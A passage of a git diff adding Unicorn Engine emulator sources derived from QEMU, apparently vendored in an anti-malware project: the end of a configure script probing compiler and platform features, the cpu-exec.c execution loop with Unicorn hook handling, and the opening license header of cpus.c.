+#endif +EOF +if compile_prog "-Werror -fno-gcse" "" ; then + TRANSLATE_OPT_CFLAGS=-fno-gcse +fi + +if test "$static" = "yes" ; then + if test "$pie" = "yes" ; then + error_exit "static and pie are mutually incompatible" + else + pie="no" + fi +fi + +if test "$pie" = ""; then + case "$cpu-$targetos" in + i386-Linux|x86_64-Linux|x32-Linux|i386-OpenBSD|x86_64-OpenBSD) + ;; + *) + pie="no" + ;; + esac +fi + +if test "$pie" != "no" ; then + cat > $TMPC << EOF + +#ifdef __linux__ +# define THREAD __thread +#else +# define THREAD +#endif + +static THREAD int tls_var; + +int main(void) { return tls_var; } + +EOF + if compile_prog "-fPIE -DPIE" "-pie"; then + QEMU_CFLAGS="-fPIE -DPIE $QEMU_CFLAGS" + LDFLAGS="-pie $LDFLAGS" + pie="yes" + if compile_prog "" "-Wl,-z,relro -Wl,-z,now" ; then + LDFLAGS="-Wl,-z,relro -Wl,-z,now $LDFLAGS" + fi + else + if test "$pie" = "yes"; then + error_exit "PIE not available due to missing toolchain support" + else + echo "Disabling PIE due to missing toolchain support" + pie="no" + fi + fi + + if compile_prog "-fno-pie" "-nopie"; then + CFLAGS_NOPIE="-fno-pie" + LDFLAGS_NOPIE="-nopie" + fi +fi + +########################################## +# __sync_fetch_and_and requires at least -march=i486. Many toolchains +# use i686 as default anyway, but for those that don't, an explicit +# specification is necessary + +if test "$cpu" = "i386"; then + cat > $TMPC << EOF +static int sfaa(int *ptr) +{ + return __sync_fetch_and_and(ptr, 0); +} + +int main(void) +{ + int val = 42; + val = __sync_val_compare_and_swap(&val, 0, 1); + sfaa(&val); + return val; +} +EOF + if ! 
compile_prog "" "" ; then + QEMU_CFLAGS="-march=i486 $QEMU_CFLAGS" + fi +fi + +######################################### +# Solaris specific configure tool chain decisions + +if test "$solaris" = "yes" ; then + if has ar; then + : + else + if test -f /usr/ccs/bin/ar ; then + error_exit "No path includes ar" \ + "Add /usr/ccs/bin to your path and rerun configure" + fi + error_exit "No path includes ar" + fi +fi + +if test -z "${target_list+xxx}" ; then + target_list="$default_target_list" +else + target_list=`echo "$target_list" | sed -e 's/,/ /g'` +fi + +# Check that we recognised the target name; this allows a more +# friendly error message than if we let it fall through. +for target in $target_list; do + case " $default_target_list " in + *" $target "*) + ;; + *) + error_exit "Unknown target name '$target'" + ;; + esac +done + +# see if system emulation was really requested +case " $target_list " in + *"-softmmu "*) softmmu=yes + ;; + *) softmmu=no + ;; +esac + +feature_not_found() { + feature=$1 + remedy=$2 + + error_exit "User requested feature $feature" \ + "configure was not able to find it." 
\ + "$remedy" +} + +# --- +# big/little endian test +cat > $TMPC << EOF +short big_endian[] = { 0x4269, 0x4765, 0x4e64, 0x4961, 0x4e00, 0, }; +short little_endian[] = { 0x694c, 0x7454, 0x654c, 0x6e45, 0x6944, 0x6e41, 0, }; +extern int foo(short *, short *); +int main(int argc, char *argv[]) { + return foo(big_endian, little_endian); +} +EOF + +if compile_object ; then + if grep -q BiGeNdIaN $TMPO ; then + bigendian="yes" + elif grep -q LiTtLeEnDiAn $TMPO ; then + bigendian="no" + else + echo big/little test failed + fi +else + echo big/little test failed +fi + +########################################## +# pthread probe +PTHREADLIBS_LIST="-pthread -lpthread -lpthreadGC2" + +pthread=no +cat > $TMPC << EOF +#include <pthread.h> +static void *f(void *p) { return NULL; } +int main(void) { + pthread_t thread; + pthread_create(&thread, 0, f, 0); + return 0; +} +EOF +if compile_prog "" "" ; then + pthread=yes +else + for pthread_lib in $PTHREADLIBS_LIST; do + if compile_prog "" "$pthread_lib" ; then + pthread=yes + found=no + for lib_entry in $LIBS; do + if test "$lib_entry" = "$pthread_lib"; then + found=yes + break + fi + done + if test "$found" = "no"; then + LIBS="$pthread_lib $LIBS" + fi + break + fi + done +fi + +if test "$mingw32" != yes -a "$pthread" = no; then + error_exit "pthread check failed" \ + "Make sure to have the pthread libs and headers installed." 
+fi + +# Search for bswap_32 function +byteswap_h=no +cat > $TMPC << EOF +#include <byteswap.h> +int main(void) { return bswap_32(0); } +EOF +if compile_prog "" "" ; then + byteswap_h=yes +fi + +# Search for bswap32 function +bswap_h=no +cat > $TMPC << EOF +#include <sys/endian.h> +#include <sys/types.h> +#include <machine/bswap.h> +int main(void) { return bswap32(0); } +EOF +if compile_prog "" "" ; then + bswap_h=yes +fi + +########################################## +# Do we need libm +cat > $TMPC << EOF +#include <math.h> +int main(int argc, char **argv) { return isnan(sin((double)argc)); } +EOF +if compile_prog "" "" ; then + : +elif compile_prog "" "-lm" ; then + LIBS="-lm $LIBS" +else + error_exit "libm check failed" +fi + +########################################## +# Do we need librt +# uClibc provides 2 versions of clock_gettime(), one with realtime +# support and one without. This means that the clock_gettime() don't +# need -lrt. We still need it for timer_create() so we check for this +# function in addition. +cat > $TMPC <<EOF +#include <signal.h> +#include <time.h> +int main(void) { + timer_create(CLOCK_REALTIME, NULL, NULL); + return clock_gettime(CLOCK_REALTIME, NULL); +} +EOF + +if compile_prog "" "" ; then + : +# we need pthread for static linking. use previous pthread test result +elif compile_prog "" "$pthread_lib -lrt" ; then + LIBS="$LIBS -lrt" +fi + +######################################## +# check if we have valgrind/valgrind.h + +valgrind_h=no +cat > $TMPC << EOF +#include <valgrind/valgrind.h> +int main(void) { + return 0; +} +EOF +if compile_prog "" "" ; then + valgrind_h=yes +fi + +######################################## +# check if cpuid.h is usable. 
+ +cpuid_h=no +cat > $TMPC << EOF +#include <cpuid.h> +int main(void) { + unsigned a, b, c, d; + int max = __get_cpuid_max(0, 0); + + if (max >= 1) { + __cpuid(1, a, b, c, d); + } + + if (max >= 7) { + __cpuid_count(7, 0, a, b, c, d); + } + + return 0; +} +EOF +if compile_prog "" "" ; then + cpuid_h=yes +fi + +######################################## +# check if __[u]int128_t is usable. + +int128=no +cat > $TMPC << EOF +#if defined(__clang_major__) && defined(__clang_minor__) +# if ((__clang_major__ < 3) || (__clang_major__ == 3) && (__clang_minor__ < 2)) +# error __int128_t does not work in CLANG before 3.2 +# endif +#endif +__int128_t a; +__uint128_t b; +int main (void) { + a = a + b; + b = a * b; + a = a * a; + return 0; +} +EOF +if compile_prog "" "" ; then + int128=yes +fi + +# Now we've finished running tests it's OK to add -Werror to the compiler flags +if test "$werror" = "yes"; then + QEMU_CFLAGS="-Werror $QEMU_CFLAGS" +fi + +if test "$solaris" = "no" ; then + if $ld --version 2>/dev/null | grep "GNU ld" >/dev/null 2>/dev/null ; then + LDFLAGS="-Wl,--warn-common $LDFLAGS" + fi +fi + +# Use ASLR, no-SEH and DEP if available +if test "$mingw32" = "yes" ; then + for flag in --dynamicbase --no-seh --nxcompat; do + if $ld --help 2>/dev/null | grep ".$flag" >/dev/null 2>/dev/null ; then + LDFLAGS="-Wl,$flag $LDFLAGS" + fi + done +fi + +echo "Source path $source_path" +echo "C compiler $cc" +echo "Host C compiler $host_cc" +echo "Objective-C compiler $objcc" +echo "ARFLAGS $ARFLAGS" +echo "CFLAGS $CFLAGS" +echo "QEMU_CFLAGS $QEMU_CFLAGS" +echo "LDFLAGS $LDFLAGS" +echo "make $make" +echo "host CPU $cpu" +echo "host big endian $bigendian" +echo "target list $target_list" +echo "tcg debug enabled $debug_tcg" +echo "strip binaries $strip_opt" +echo "static build $static" +echo "mingw32 support $mingw32" +if test -n "$sparc_cpu"; then + echo "Target Sparc Arch $sparc_cpu" +fi +echo "PIE $pie" + +config_host_mak="config-host.mak" + +echo "# Automatically generated by 
configure - do not modify" > $config_host_mak +echo >> $config_host_mak + +echo all: >> $config_host_mak +echo "extra_cflags=$EXTRA_CFLAGS" >> $config_host_mak +echo "extra_ldflags=$EXTRA_LDFLAGS" >> $config_host_mak + +echo "ARCH=$ARCH" >> $config_host_mak + +if test "$debug_tcg" = "yes" ; then + echo "CONFIG_DEBUG_TCG=y" >> $config_host_mak +fi +if test "$strip_opt" = "yes" ; then + echo "STRIP=${strip}" >> $config_host_mak +fi +if test "$bigendian" = "yes" ; then + echo "HOST_WORDS_BIGENDIAN=y" >> $config_host_mak +fi +if test "$mingw32" = "yes" ; then + echo "CONFIG_WIN32=y" >> $config_host_mak + rc_version=`cat $source_path/VERSION` + version_major=${rc_version%%.*} + rc_version=${rc_version#*.} + version_minor=${rc_version%%.*} + rc_version=${rc_version#*.} + version_subminor=${rc_version%%.*} + version_micro=0 + echo "CONFIG_FILEVERSION=$version_major,$version_minor,$version_subminor,$version_micro" >> $config_host_mak + echo "CONFIG_PRODUCTVERSION=$version_major,$version_minor,$version_subminor,$version_micro" >> $config_host_mak +else + echo "CONFIG_POSIX=y" >> $config_host_mak +fi + +if test "$linux" = "yes" ; then + echo "CONFIG_LINUX=y" >> $config_host_mak +fi + +if test "$solaris" = "yes" ; then + echo "CONFIG_SOLARIS=y" >> $config_host_mak + echo "CONFIG_SOLARIS_VERSION=$solarisrev" >> $config_host_mak + if test "$needs_libsunmath" = "yes" ; then + echo "CONFIG_NEEDS_LIBSUNMATH=y" >> $config_host_mak + fi +fi +if test "$static" = "yes" ; then + echo "CONFIG_STATIC=y" >> $config_host_mak +fi +echo "SRC_PATH=$source_path" >> $config_host_mak +echo "TARGET_DIRS=$target_list" >> $config_host_mak +if test "$byteswap_h" = "yes" ; then + echo "CONFIG_BYTESWAP_H=y" >> $config_host_mak +fi +if test "$bswap_h" = "yes" ; then + echo "CONFIG_MACHINE_BSWAP_H=y" >> $config_host_mak +fi + +# XXX: suppress that +if [ "$bsd" = "yes" ] ; then + echo "CONFIG_BSD=y" >> $config_host_mak +fi + +if test "$valgrind_h" = "yes" ; then + echo "CONFIG_VALGRIND_H=y" >> 
$config_host_mak +fi + +if test "$cpuid_h" = "yes" ; then + echo "CONFIG_CPUID_H=y" >> $config_host_mak +fi + +if test "$int128" = "yes" ; then + echo "CONFIG_INT128=y" >> $config_host_mak +fi + +if test "$ARCH" = "sparc64" ; then + QEMU_INCLUDES="-I\$(SRC_PATH)/tcg/sparc $QEMU_INCLUDES" +elif test "$ARCH" = "s390x" ; then + QEMU_INCLUDES="-I\$(SRC_PATH)/tcg/s390 $QEMU_INCLUDES" +elif test "$ARCH" = "x86_64" -o "$ARCH" = "x32" ; then + QEMU_INCLUDES="-I\$(SRC_PATH)/tcg/i386 $QEMU_INCLUDES" +elif test "$ARCH" = "ppc64" ; then + QEMU_INCLUDES="-I\$(SRC_PATH)/tcg/ppc $QEMU_INCLUDES" +else + QEMU_INCLUDES="-I\$(SRC_PATH)/tcg/\$(ARCH) $QEMU_INCLUDES" +fi +QEMU_INCLUDES="-I\$(SRC_PATH)/tcg $QEMU_INCLUDES" + +echo "MAKE=$make" >> $config_host_mak +echo "CC=$cc" >> $config_host_mak +echo "CC_I386=$cc_i386" >> $config_host_mak +echo "HOST_CC=$host_cc" >> $config_host_mak +echo "OBJCC=$objcc" >> $config_host_mak +echo "AR=$ar" >> $config_host_mak +echo "ARFLAGS=$ARFLAGS" >> $config_host_mak +echo "AS=$as" >> $config_host_mak +echo "CPP=$cpp" >> $config_host_mak +echo "OBJCOPY=$objcopy" >> $config_host_mak +echo "LD=$ld" >> $config_host_mak +echo "NM=$nm" >> $config_host_mak +echo "CFLAGS=$CFLAGS" >> $config_host_mak +echo "CFLAGS_NOPIE=$CFLAGS_NOPIE" >> $config_host_mak +echo "QEMU_CFLAGS=$QEMU_CFLAGS" >> $config_host_mak +echo "QEMU_INCLUDES=$QEMU_INCLUDES" >> $config_host_mak +echo "LDFLAGS=$LDFLAGS" >> $config_host_mak +echo "LDFLAGS_NOPIE=$LDFLAGS_NOPIE" >> $config_host_mak +echo "LIBS+=$LIBS" >> $config_host_mak +echo "EXESUF=$EXESUF" >> $config_host_mak +echo "DSOSUF=$DSOSUF" >> $config_host_mak +echo "LDFLAGS_SHARED=$LDFLAGS_SHARED" >> $config_host_mak +echo "TRANSLATE_OPT_CFLAGS=$TRANSLATE_OPT_CFLAGS" >> $config_host_mak + +for target in $target_list; do +target_dir="$target" +config_target_mak=$target_dir/config-target.mak +target_name=`echo $target | cut -d '-' -f 1` +target_bigendian="no" + +case "$target_name" in + 
aarch64eb|armeb|lm32|m68k|microblaze|mips|mipsn32|mips64|moxie|or32|ppc|ppcemb|ppc64|ppc64abi32|s390x|sh4eb|sparc|sparc64|sparc32plus|xtensaeb) + target_bigendian=yes + ;; +esac +target_softmmu="yes" +case "$target" in + ${target_name}-softmmu) + target_softmmu="yes" + ;; + *) + error_exit "Target '$target' not recognised" + exit 1 + ;; +esac + +mkdir -p $target_dir +echo "# Automatically generated by configure - do not modify" > $config_target_mak + +bflt="no" + +TARGET_ARCH="$target_name" +TARGET_BASE_ARCH="" + +case "$target_name" in + i386) + ;; + x86_64) + TARGET_BASE_ARCH=i386 + ;; + alpha) + ;; + arm|armeb) + TARGET_ARCH=arm + bflt="yes" + ;; + aarch64|aarch64eb) + TARGET_BASE_ARCH=arm + TARGET_ARCH=aarch64 + bflt="yes" + ;; + cris) + ;; + lm32) + ;; + m68k) + bflt="yes" + ;; + microblaze|microblazeel) + TARGET_ARCH=microblaze + bflt="yes" + ;; + mips|mipsel) + TARGET_ARCH=mips + echo "TARGET_ABI_MIPSO32=y" >> $config_target_mak + ;; + mipsn32|mipsn32el) + TARGET_ARCH=mips64 + TARGET_BASE_ARCH=mips + echo "TARGET_ABI_MIPSN32=y" >> $config_target_mak + echo "TARGET_ABI32=y" >> $config_target_mak + ;; + mips64|mips64el) + TARGET_ARCH=mips64 + TARGET_BASE_ARCH=mips + echo "TARGET_ABI_MIPSN64=y" >> $config_target_mak + ;; + tricore) + ;; + moxie) + ;; + or32) + TARGET_ARCH=openrisc + TARGET_BASE_ARCH=openrisc + ;; + ppc) + ;; + ppcemb) + TARGET_BASE_ARCH=ppc + ;; + ppc64) + TARGET_BASE_ARCH=ppc + ;; + ppc64le) + TARGET_ARCH=ppc64 + TARGET_BASE_ARCH=ppc + ;; + ppc64abi32) + TARGET_ARCH=ppc64 + TARGET_BASE_ARCH=ppc + echo "TARGET_ABI32=y" >> $config_target_mak + ;; + sh4|sh4eb) + TARGET_ARCH=sh4 + bflt="yes" + ;; + sparc) + ;; + sparc64) + TARGET_BASE_ARCH=sparc + ;; + sparc32plus) + TARGET_ARCH=sparc64 + TARGET_BASE_ARCH=sparc + echo "TARGET_ABI32=y" >> $config_target_mak + ;; + s390x) + ;; + unicore32) + ;; + xtensa|xtensaeb) + TARGET_ARCH=xtensa + ;; + *) + error_exit "Unsupported target CPU" + ;; +esac +# TARGET_BASE_ARCH needs to be defined after TARGET_ARCH 
+if [ "$TARGET_BASE_ARCH" = "" ]; then + TARGET_BASE_ARCH=$TARGET_ARCH +fi + +symlink "$source_path/Makefile.target" "$target_dir/Makefile" + +upper() { + echo "$@"| LC_ALL=C tr '[a-z]' '[A-Z]' +} + +target_arch_name="`upper $TARGET_ARCH`" +echo "TARGET_$target_arch_name=y" >> $config_target_mak +echo "TARGET_NAME=$target_name" >> $config_target_mak +echo "TARGET_BASE_ARCH=$TARGET_BASE_ARCH" >> $config_target_mak +if test "$target_bigendian" = "yes" ; then + echo "TARGET_WORDS_BIGENDIAN=y" >> $config_target_mak +fi +if test "$target_softmmu" = "yes" ; then + echo "CONFIG_SOFTMMU=y" >> $config_target_mak +fi + +# generate QEMU_CFLAGS/LDFLAGS for targets + +cflags="" +ldflags="" + +case "$ARCH" in +alpha) + # Ensure there's only a single GP + cflags="-msmall-data $cflags" +;; +esac + +echo "LDFLAGS+=$ldflags" >> $config_target_mak +echo "QEMU_CFLAGS+=$cflags" >> $config_target_mak +echo "QEMU_CFLAGS+=-include ${target_name}.h" >> $config_target_mak + +done # for target in $targets + +# Save the configure command line for later reuse. +cat <<EOD >config.status +#!/bin/sh +# Generated by configure. +# Run this file to recreate the current configuration. +# Compiler output produced by configure, useful for debugging +# configure, is in config.log if it exists. 
+EOD +printf "exec" >>config.status +printf " '%s'" "$0" "$@" >>config.status +echo >>config.status +chmod +x config.status + +rm -r "$TMPDIR1" diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/cpu-exec.c b/ai_anti_malware/unicorn/unicorn-master/qemu/cpu-exec.c new file mode 100644 index 0000000..b4aa4bf --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/cpu-exec.c @@ -0,0 +1,449 @@ +/* + * emulator main execution loop + * + * Copyright (c) 2003-2005 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. + */ + +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +#include "tcg.h" +#include "sysemu/sysemu.h" + +#include "uc_priv.h" + +static tcg_target_ulong cpu_tb_exec(CPUState *cpu, uint8_t *tb_ptr); +static TranslationBlock *tb_find_slow(CPUArchState *env, target_ulong pc, + target_ulong cs_base, uint64_t flags); +static TranslationBlock *tb_find_fast(CPUArchState *env); +static void cpu_handle_debug_exception(CPUArchState *env); + +void cpu_loop_exit(CPUState *cpu) +{ + cpu->current_tb = NULL; + siglongjmp(cpu->jmp_env, 1); +} + +/* exit the current TB from a signal handler. 
The host registers are + restored in a state compatible with the CPU emulator + */ +void cpu_resume_from_signal(CPUState *cpu, void *puc) +{ + /* XXX: restore cpu registers saved in host registers */ + cpu->exception_index = -1; + siglongjmp(cpu->jmp_env, 1); +} + +/* main execution loop */ + +int cpu_exec(struct uc_struct *uc, CPUArchState *env) // qq +{ + CPUState *cpu = ENV_GET_CPU(env); + TCGContext *tcg_ctx = env->uc->tcg_ctx; + CPUClass *cc = CPU_GET_CLASS(uc, cpu); +#ifdef TARGET_I386 + X86CPU *x86_cpu = X86_CPU(uc, cpu); +#endif + int ret = 0, interrupt_request; + TranslationBlock *tb; + uint8_t *tc_ptr; + uintptr_t next_tb; + struct hook *hook; + + if (cpu->halted) { + if (!cpu_has_work(cpu)) { + return EXCP_HALTED; + } + + cpu->halted = 0; + } + + uc->current_cpu = cpu; + + /* As long as current_cpu is null, up to the assignment just above, + * requests by other threads to exit the execution loop are expected to + * be issued using the exit_request global. We must make sure that our + * evaluation of the global value is performed past the current_cpu + * value transition point, which requires a memory barrier as well as + * an instruction scheduling constraint on modern architectures. */ + smp_mb(); + + if (unlikely(uc->exit_request)) { + cpu->exit_request = 1; + } + + cc->cpu_exec_enter(cpu); + cpu->exception_index = -1; + env->invalid_error = UC_ERR_OK; + + /* prepare setjmp context for exception handling */ + for(;;) { + if (sigsetjmp(cpu->jmp_env, 0) == 0) { + if (uc->stop_request || uc->invalid_error) { + break; + } + + /* if an exception is pending, we execute it here */ + if (cpu->exception_index >= 0) { + //printf(">>> GOT INTERRUPT. 
exception idx = %x\n", cpu->exception_index); // qq + if (cpu->exception_index >= EXCP_INTERRUPT) { + /* exit request from the cpu execution loop */ + ret = cpu->exception_index; + if (ret == EXCP_DEBUG) { + cpu_handle_debug_exception(env); + } + break; + } else { + bool catched = false; +#if defined(CONFIG_USER_ONLY) + /* if user mode only, we simulate a fake exception + which will be handled outside the cpu execution + loop */ +#if defined(TARGET_I386) + cc->do_interrupt(cpu); +#endif + ret = cpu->exception_index; + break; +#else +#if defined(TARGET_X86_64) + if (env->exception_is_int) { + // point EIP to the next instruction after INT + env->eip = env->exception_next_eip; + } +#endif +#if defined(TARGET_MIPS) || defined(TARGET_MIPS64) + env->active_tc.PC = uc->next_pc; +#endif + if (uc->stop_interrupt && uc->stop_interrupt(cpu->exception_index)) { + // Unicorn: call registered invalid instruction callbacks + HOOK_FOREACH_VAR_DECLARE; + HOOK_FOREACH(uc, hook, UC_HOOK_INSN_INVALID) { + if (hook->to_delete) + continue; + catched = ((uc_cb_hookinsn_invalid_t)hook->callback)(uc, hook->user_data); + if (catched) + break; + } + if (!catched) + uc->invalid_error = UC_ERR_INSN_INVALID; + } else { + // Unicorn: call registered interrupt callbacks + HOOK_FOREACH_VAR_DECLARE; + HOOK_FOREACH(uc, hook, UC_HOOK_INTR) { + if (hook->to_delete) + continue; + ((uc_cb_hookintr_t)hook->callback)(uc, cpu->exception_index, hook->user_data); + catched = true; + } + if (!catched) + uc->invalid_error = UC_ERR_EXCEPTION; + } + + // Unicorn: If un-catched interrupt, stop executions. + if (!catched) { + cpu->halted = 1; + ret = EXCP_HLT; + break; + } + + cpu->exception_index = -1; +#endif + } + } + + next_tb = 0; /* force lookup of first TB */ + for(;;) { + interrupt_request = cpu->interrupt_request; + + if (unlikely(interrupt_request)) { + if (unlikely(cpu->singlestep_enabled & SSTEP_NOIRQ)) { + /* Mask out external interrupts for this step. 
*/ + interrupt_request &= ~CPU_INTERRUPT_SSTEP_MASK; + } + + if (interrupt_request & CPU_INTERRUPT_DEBUG) { + cpu->interrupt_request &= ~CPU_INTERRUPT_DEBUG; + cpu->exception_index = EXCP_DEBUG; + cpu_loop_exit(cpu); + } + + if (interrupt_request & CPU_INTERRUPT_HALT) { + cpu->interrupt_request &= ~CPU_INTERRUPT_HALT; + cpu->halted = 1; + cpu->exception_index = EXCP_HLT; + cpu_loop_exit(cpu); + } +#if defined(TARGET_I386) + if (interrupt_request & CPU_INTERRUPT_INIT) { + cpu_svm_check_intercept_param(env, SVM_EXIT_INIT, 0); + do_cpu_init(x86_cpu); + cpu->exception_index = EXCP_HALTED; + cpu_loop_exit(cpu); + } +#else + if (interrupt_request & CPU_INTERRUPT_RESET) { + cpu_reset(cpu); + } +#endif + /* The target hook has 3 exit conditions: + False when the interrupt isn't processed, + True when it is, and we should restart on a new TB, + and via longjmp via cpu_loop_exit. */ + if (cc->cpu_exec_interrupt(cpu, interrupt_request)) { + next_tb = 0; + } + + /* Don't use the cached interrupt_request value, + do_interrupt may have updated the EXITTB flag. */ + if (cpu->interrupt_request & CPU_INTERRUPT_EXITTB) { + cpu->interrupt_request &= ~CPU_INTERRUPT_EXITTB; + /* ensure that no TB jump will be modified as + the program flow was changed */ + next_tb = 0; + } + } + + if (unlikely(cpu->exit_request)) { + cpu->exit_request = 0; + cpu->exception_index = EXCP_INTERRUPT; + cpu_loop_exit(cpu); + } + + tb = tb_find_fast(env); // qq + if (!tb) { // invalid TB due to invalid code? + uc->invalid_error = UC_ERR_FETCH_UNMAPPED; + ret = EXCP_HLT; + break; + } + + /* Note: we do it here to avoid a gcc bug on Mac OS X when + doing it in tb_find_slow */ + if (tcg_ctx->tb_ctx.tb_invalidated_flag) { + /* as some TB could have been invalidated because + of memory exceptions while generating the code, we + must recompute the hash index here */ + next_tb = 0; + tcg_ctx->tb_ctx.tb_invalidated_flag = 0; + } + + /* see if we can patch the calling TB. 
When the TB + spans two pages, we cannot safely do a direct + jump. */ + if (next_tb != 0 && tb->page_addr[1] == -1) { + tb_add_jump((TranslationBlock *)(next_tb & ~TB_EXIT_MASK), + next_tb & TB_EXIT_MASK, tb); + } + + /* cpu_interrupt might be called while translating the + TB, but before it is linked into a potentially + infinite loop and becomes env->current_tb. Avoid + starting execution if there is a pending interrupt. */ + cpu->current_tb = tb; + barrier(); + if (likely(!cpu->exit_request)) { + tc_ptr = tb->tc_ptr; + /* execute the generated code */ + next_tb = cpu_tb_exec(cpu, tc_ptr); // qq + + switch (next_tb & TB_EXIT_MASK) { + case TB_EXIT_REQUESTED: + /* Something asked us to stop executing + * chained TBs; just continue round the main + * loop. Whatever requested the exit will also + * have set something else (eg exit_request or + * interrupt_request) which we will handle + * next time around the loop. + */ + tb = (TranslationBlock *)(next_tb & ~TB_EXIT_MASK); + next_tb = 0; + break; + default: + break; + } + } + + cpu->current_tb = NULL; + /* reset soft MMU for next block (it can currently + only be set by a memory fault) */ + } /* for(;;) */ + } else { + /* Reload env after longjmp - the compiler may have smashed all + * local variables as longjmp is marked 'noreturn'. */ + cpu = uc->current_cpu; + env = cpu->env_ptr; + cc = CPU_GET_CLASS(uc, cpu); +#ifdef TARGET_I386 + x86_cpu = X86_CPU(uc, cpu); +#endif + } + } /* for(;;) */ + + // Unicorn: Clear any TCG exit flag that might have been left set by exit requests + uc->current_cpu->tcg_exit_req = 0; + + cc->cpu_exec_exit(cpu); + + // Unicorn: flush JIT cache to because emulation might stop in + // the middle of translation, thus generate incomplete code. 
+ // TODO: optimize this for better performance + tb_flush(env); + + /* fail safe : never use current_cpu outside cpu_exec() */ + // uc->current_cpu = NULL; + + return ret; +} + +/* Execute a TB, and fix up the CPU state afterwards if necessary */ +static tcg_target_ulong cpu_tb_exec(CPUState *cpu, uint8_t *tb_ptr) +{ + CPUArchState *env = cpu->env_ptr; + TCGContext *tcg_ctx = env->uc->tcg_ctx; + uintptr_t next_tb; + + next_tb = tcg_qemu_tb_exec(env, tb_ptr); + + if ((next_tb & TB_EXIT_MASK) > TB_EXIT_IDX1) { + /* We didn't start executing this TB (eg because the instruction + * counter hit zero); we must restore the guest PC to the address + * of the start of the TB. + */ + CPUClass *cc = CPU_GET_CLASS(env->uc, cpu); + TranslationBlock *tb = (TranslationBlock *)(next_tb & ~TB_EXIT_MASK); + + /* Both set_pc() & synchronize_fromtb() can be ignored when code tracing hook is installed, + * or timer mode is in effect, since these already fix the PC. + */ + if (!HOOK_EXISTS(env->uc, UC_HOOK_CODE) && !env->uc->timeout) { + if (cc->synchronize_from_tb) { + // avoid sync twice when helper_uc_tracecode() already did this. + if (env->uc->emu_counter <= env->uc->emu_count && + !env->uc->stop_request && !env->uc->quit_request) + cc->synchronize_from_tb(cpu, tb); + } else { + assert(cc->set_pc); + // avoid sync twice when helper_uc_tracecode() already did this. + if (env->uc->emu_counter <= env->uc->emu_count && + !env->uc->stop_request && !env->uc->quit_request) + cc->set_pc(cpu, tb->pc); + } + } + } + + if ((next_tb & TB_EXIT_MASK) == TB_EXIT_REQUESTED) { + /* We were asked to stop executing TBs (probably a pending + * interrupt. We've now stopped, so clear the flag. 
+ */ + cpu->tcg_exit_req = 0; + } + + return next_tb; +} + +static TranslationBlock *tb_find_slow(CPUArchState *env, target_ulong pc, + target_ulong cs_base, uint64_t flags) // qq +{ + CPUState *cpu = ENV_GET_CPU(env); + TCGContext *tcg_ctx = env->uc->tcg_ctx; + TranslationBlock *tb, **ptb1; + unsigned int h; + tb_page_addr_t phys_pc, phys_page1; + target_ulong virt_page2; + + tcg_ctx->tb_ctx.tb_invalidated_flag = 0; + + /* find translated block using physical mappings */ + phys_pc = get_page_addr_code(env, pc); // qq + if (phys_pc == -1) { // invalid code? + return NULL; + } + phys_page1 = phys_pc & TARGET_PAGE_MASK; + h = tb_phys_hash_func(phys_pc); + ptb1 = &tcg_ctx->tb_ctx.tb_phys_hash[h]; + for(;;) { + tb = *ptb1; + if (!tb) + goto not_found; + if (tb->pc == pc && + tb->page_addr[0] == phys_page1 && + tb->cs_base == cs_base && + tb->flags == flags) { + /* check next page if needed */ + if (tb->page_addr[1] != -1) { + tb_page_addr_t phys_page2; + + virt_page2 = (pc & TARGET_PAGE_MASK) + + TARGET_PAGE_SIZE; + phys_page2 = get_page_addr_code(env, virt_page2); + if (tb->page_addr[1] == phys_page2) + goto found; + } else { + goto found; + } + } + ptb1 = &tb->phys_hash_next; + } +not_found: + /* if no translated code available, then translate it now */ + tb = tb_gen_code(cpu, pc, cs_base, (int)flags, 0); // qq + if (tb == NULL) { + return NULL; + } + +found: + /* Move the last found TB to the head of the list */ + if (likely(*ptb1)) { + *ptb1 = tb->phys_hash_next; + tb->phys_hash_next = tcg_ctx->tb_ctx.tb_phys_hash[h]; + tcg_ctx->tb_ctx.tb_phys_hash[h] = tb; + } + /* we add the TB in the virtual pc hash table */ + cpu->tb_jmp_cache[tb_jmp_cache_hash_func(pc)] = tb; + return tb; +} + +static TranslationBlock *tb_find_fast(CPUArchState *env) // qq +{ + CPUState *cpu = ENV_GET_CPU(env); + TranslationBlock *tb; + target_ulong cs_base, pc; + int flags; + + /* we record a subset of the CPU state. It will + always be the same before a given translated block + is executed. 
*/ + cpu_get_tb_cpu_state(env, &pc, &cs_base, &flags); + tb = cpu->tb_jmp_cache[tb_jmp_cache_hash_func(pc)]; + if (unlikely(!tb || tb->pc != pc || tb->cs_base != cs_base || + tb->flags != flags)) { + tb = tb_find_slow(env, pc, cs_base, flags); // qq + } + return tb; +} + +static void cpu_handle_debug_exception(CPUArchState *env) +{ + CPUState *cpu = ENV_GET_CPU(env); + CPUClass *cc = CPU_GET_CLASS(env->uc, cpu); + CPUWatchpoint *wp; + + if (!cpu->watchpoint_hit) { + QTAILQ_FOREACH(wp, &cpu->watchpoints, entry) { + wp->flags &= ~BP_WATCHPOINT_HIT; + } + } + + cc->debug_excp_handler(cpu); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/cpus.c b/ai_anti_malware/unicorn/unicorn-master/qemu/cpus.c new file mode 100644 index 0000000..28509d5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/cpus.c @@ -0,0 +1,213 @@ +/* + * QEMU System Emulator + * + * Copyright (c) 2003-2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * 